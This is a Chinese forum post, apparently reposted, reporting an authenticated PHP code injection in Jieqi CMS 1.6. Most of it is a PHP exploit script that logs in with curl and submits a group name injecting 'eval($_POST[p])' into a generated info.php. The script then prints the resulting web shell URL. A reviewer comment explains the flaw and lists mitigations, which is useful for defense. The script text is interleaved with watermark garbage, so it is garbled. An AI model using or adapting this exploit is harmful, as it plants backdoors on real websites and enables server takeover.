杰奇网站管理系统(简称 JIEQI CMS,中国国家版权局著作权登记号:2006SR03382)是一套模块化的网站架设系统,具备简单灵活、性能卓越、安全可靠等特性。我们为大家提供了目前最流行的杰奇小说连载系统、杰奇原创漫画系统及数字出版解决方案,并提供各类网站定制服务。
该系统存在多个远程安全漏洞,今天报告的这个是1.6版本的一个远程代码执行漏洞,应该有2年多历史了。
需要有一个能创建圈子的用户。
0 X4 M4 q% [: h9 P& g1 J<?php
/*
 * NOTE(review): proof-of-concept for the authenticated PHP code injection in
 * Jieqi CMS 1.6 that the post describes. From what is visible in this script,
 * it logs in through login.php (cookie jar), submits a multipart form to
 * modules/group/create.php whose "gname" value closes a single-quoted PHP
 * string, and then expects the result to be reachable at
 * files/group/userdir/0/<group id>/info.php -- presumably because the group
 * name is written unescaped into that generated PHP file. The server-side
 * code is not on this page; confirm the exact sink against the CMS source.
 *
 * Defender notes: never write user-controlled strings into executable PHP
 * (persist group metadata as data -- serialized/JSON -- or at minimum escape
 * it with var_export() and validate the allowed character set of gname);
 * deny PHP execution under files/group/userdir/ at the web server; audit
 * existing group names and generated info.php files for unexpected PHP
 * tokens, and alert on POSTs to create.php whose gname contains quotes or
 * "eval(". The text that follows is as posted and contains forum watermark
 * residue, so it does not run as-is.
 */
$ v$ }8 L1 {& M. X# [0 a' V 8 r- k. f' {% p$ y, i8 W& z
print_r(', Y! B3 O; p6 p, N3 ?( l' z
+---------------------------------------------------------------------------+
' a1 T s8 R3 S% Y8 a: g8 ^ UJieqi CMS V1.6 PHP Code Injection Exploit0 D" R2 `# v) ~) @% G+ s
by flyh4t! V& C. i. | h! h
mail: phpsec at hotmail dot com; G7 j9 E1 K8 S
team: http://www.wolvez.org
6 @" _# S/ [3 M6 e+---------------------------------------------------------------------------+
( o7 l3 F! E6 o/ a6 f'); /**; V/ L- Y! F, _0 f: z2 S8 D o
* works regardless of php.ini settings+ w' M8 @4 N. f& F& R9 e
*/ if ($argc < 5) { print_r('
: i6 q6 X9 E5 \7 _+---------------------------------------------------------------------------+( A! `- @. m7 [' ]6 d$ B c& i
Usage: php '.$argv[0].' host path username7 u) A2 q4 q$ x9 M9 s
host: target server (ip/hostname)8 k7 W6 o' x6 e" G: s. t/ x1 t
path: path to jieqicms $ Q( F" g: [0 x( m1 ~/ t) m
uasename: a username who can create group( G- Q* F- p, d+ O P W
Example:4 B& E3 D8 ~% R% ^. L+ B
php '.$argv[0].' localhost /jieqicmsv1.6/ vipuser1 password. B! a& ~" N' I; o' i5 q
+---------------------------------------------------------------------------+
7 P* w& p2 r/ t) ]'); exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; $path = $argv[2]; $username = $argv[3]; $password = $argv[4]; /*get cookie*/ $cookie_jar_index = 'cookie.txt'; $url1 = "http://$host/$path/login.php"; $params = "password=$password&username=$username&usecookie=86400&submit=%26%23160%3B%B5%C7%26%23160%3B%26%23160%3B%C2%BC%26%23160%3B&action=login&jumpreferer=1"; $curl1 = curl_init(); curl_setopt($curl1, CURLOPT_URL, $url1); curl_setopt($curl1, CURLOPT_COOKIEJAR, $cookie_jar_index); curl_setopt($curl1, CURLOPT_POST, 1); curl_setopt($curl1, CURLOPT_POSTFIELDS, $params); ob_start(); $data1 = curl_exec($curl1); if ($data1 === FALSE) { echo "cURL Error: " . curl_error($ch); exit('exploit failed'); } curl_close($curl1); ob_clean(); /*get shell*/ $params ='-----------------------------23281168279961
9 z; v5 t* W& |4 E2 b6 a2 _Content-Disposition: form-data; name="gname", h, n+ X% ?% V% n0 Y
9 f2 H1 @ d( c0 k% V% c
'; $params .="';"; $params .='eval($_POST[p]);//flyh4t. D* t8 v7 L' r0 t6 E) E
-----------------------------23281168279961- A1 _' | C) ? L q
Content-Disposition: form-data; name="gcatid"
, E! n& A8 p5 s. |4 n( R
- u+ a- e2 |& s! X8 e( w& ?1
* ` S; [4 H# q3 S/ ~8 i-----------------------------23281168279961
2 A8 C9 L; l t" eContent-Disposition: form-data; name="gaudit"
) X2 ^" K `# ]# z0 D' a
5 N5 d; ^" n3 Z- O1
' `* S' G4 L% _ I1 H-----------------------------23281168279961
( ]. ~3 ]/ K1 NContent-Disposition: form-data; name="gbrief"
+ y" N) y/ G8 Y% L 7 j8 v) l1 \* c! Y# t; b+ U, Q% M
1
5 @2 ^6 ]( F8 q" s( o6 i-----------------------------23281168279961--% [* F' ?$ j6 m+ }( t* e% K
'; $url2 = "http://$host/$path/modules/group/create.php"; $curl2 = curl_init(); $header =array( 'Content-Type: multipart/form-data; boundary=---------------------------23281168279961' ); curl_setopt($curl2, CURLOPT_URL, $url2); curl_setopt($curl2, CURLOPT_HTTPHEADER, $header); curl_setopt($curl2, CURLOPT_COOKIEFILE, $cookie_jar_index); curl_setopt($curl2, CURLOPT_POST, 1); curl_setopt($curl2, CURLOPT_POSTFIELDS, $params); ob_start(); curl_exec($curl2); curl_close($curl2); $resp = ob_get_contents(); //$rs就是返回的内容 ob_clean(); www.2cto.com
* W4 G! o3 i3 U! F1 p A# i # T" i9 n% z% r$ g
preg_match('/g=([0-9]{1,4})/', $resp, $shell); //print_r($shell); //print_r($resp); $url = "http://$host/$path/files/group/userdir/0/$shell[1]/info.php"; echo "view you shell here(password:p)\r\n" ; echo $url; |